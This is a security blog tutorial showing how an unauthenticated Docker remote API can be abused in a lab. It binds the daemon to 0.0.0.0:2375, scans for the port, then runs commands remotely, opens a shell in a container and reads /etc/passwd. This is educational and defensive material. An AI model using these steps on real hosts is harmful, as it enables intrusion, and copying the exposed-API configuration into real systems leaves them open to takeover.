Abusing Docker Remote API

Enable Docker API for Remote connection and Abusing the Docker API

In this blog, we will learn How can we abuse the Docker API after enabling the Docker API for Remote Connection. But, first of all, we will learn about Docker client-server Architecture. So that we can have a basic understanding of Docker API, Docker CLI, and Docker daemon

Docker daemon

The brain behind all operations and functions is the Docker daemon. The Docker daemon handles Docker objects such as containers, images, and networks by listening for Docker API calls. To manage Docker services, a daemon can communicate with other daemons. When you use the docker run command to start a container, the docker client converts the command into an HTTP API call and delivers it to the Docker daemon. The Docker daemon reviews the request, communicates with the underlying operating system, and then starts your container.

Docker CLI

Docker CLI is a client for dealing with the Docker daemon via a command-line interface. Developers love Docker and the main reason behind it is that it substantially simplifies the management of container instances. Users can interact with Docker using the Docker client. The Docker client can run on the same local machine as the Docker daemon or on a remote machine. The Docker client can communicate with several daemons at the same time. The Docker Client’s main goal is to allow users to direct the download the images and have them run on a Docker host.

Docker API

Docker API is a communication interface that allows Daemon and CLI to communicate over Unix or TCP socket.

Docker API is a RESTful JSON API for managing Docker containers and images. It has the following functions:

  • Managing containers: start, stop, kill, list, create, pause
  • Managing images: delete, pull/push from registry to local system
  • Network configuration: port forwarding configurations for container-based on host machine’s IP address.

All these mechanisms can be accessed through this RESTful JSON API. To get started with docker API you need to have an installation of Docker that has been configured in the way outlined by the documentation of the particular implementation you are using (e.g., Docker Engine or Boot2Docker).

Enable Docker API for Remote Connection

Let’s check whether the target host does have an open port for docker service or not. We will check this using the Nmap port scan.

                        # nmap -p- <IP of host machine where docker application is running>

Abusing Docker Remote API

As we have mentioned earlier Docker API runs over UNIX or TCP socket, we will try to identify the process for docker at host machine using following command:

            # ps -ef | grep docker

Abusing Docker Remote API

Now, we want to access the docker daemon externally. For that, we have to modify the configuration of REST API. Run the given command:

            # nano /lib/systemd/system/docker.service

Abusing Docker Remote API

Now, we will modify the highlighted part of image with the following command and save the file.

            -H=tcp://0.0.0.0:2375

Abusing Docker Remote API

After saving the changes, restart the docker service using the following command:

            # systemctl daemon-reload

            # service docker restart

Abusing Docker Remote API

Now, we will again identify the process for docker at host machine using the following command:

            # ps -ef | grep docker

Abusing Docker Remote API

Here, we can notice the change in highlighted part of the image.

Abusing Docker API

We can establish a remote connection with the docker application using the Docker API over the 2375/tcp port.

Now, we will again check whether the target host does have any open port for docker service or not using nmap command.

Abusing Docker Remote API

Here, we can see that there is an open port for docker service.

We can try to connect with the daemon on the target machine as the port is open. However, we have to install a docker on our local system for this. So, we installed Docker on Kali Linux and have it running on our target system as well using the following command:

            # sudo apt install docker.io

Abusing Docker Remote API

To make sure we can access the docker daemon remotely, use the following command to find out what version of Docker is installed.

            # docker -H <remote host ip>:<port> version

Abusing Docker Remote API

Now, pull the docker image of vulnerables/cve-2014-6271 in Ubuntu using the following command:

            # docker pull vulnerables/cve-2014-6271

Abusing Docker Remote API

After, pulling an image, run the image using given command in Ubuntu:

            # docker run –rm -it -p 8080:80 vulnerables/cve-2014-6271

We will now list all of the Docker images in Kali Linux that are currently running on the remote machine Ubuntu.

            # dcoker -H 192.168.29.115:2375 images

Abusing Docker Remote API

Similarly, We will use the following command in order to identify the process for running a container:

            # docker -H 192.168.29.115:2375 ps -a        

Now, we will try to access the docker container remotely using following command:

# docker -H 192.168.0.156:2375 exec -it <Container ID> /bin/bash

# whoami

# tail /etc/passwd

Abusing Docker Remote API

As a result, the poorly designed Docker API that is accessible to external connections can be used to launch an attack and an attacker can easily compromise the entire host machine and attempt to acquire root access.

Author

Hard Dudhia

Cyber Security Intern

Leave a Comment

Your email address will not be published. Required fields are marked *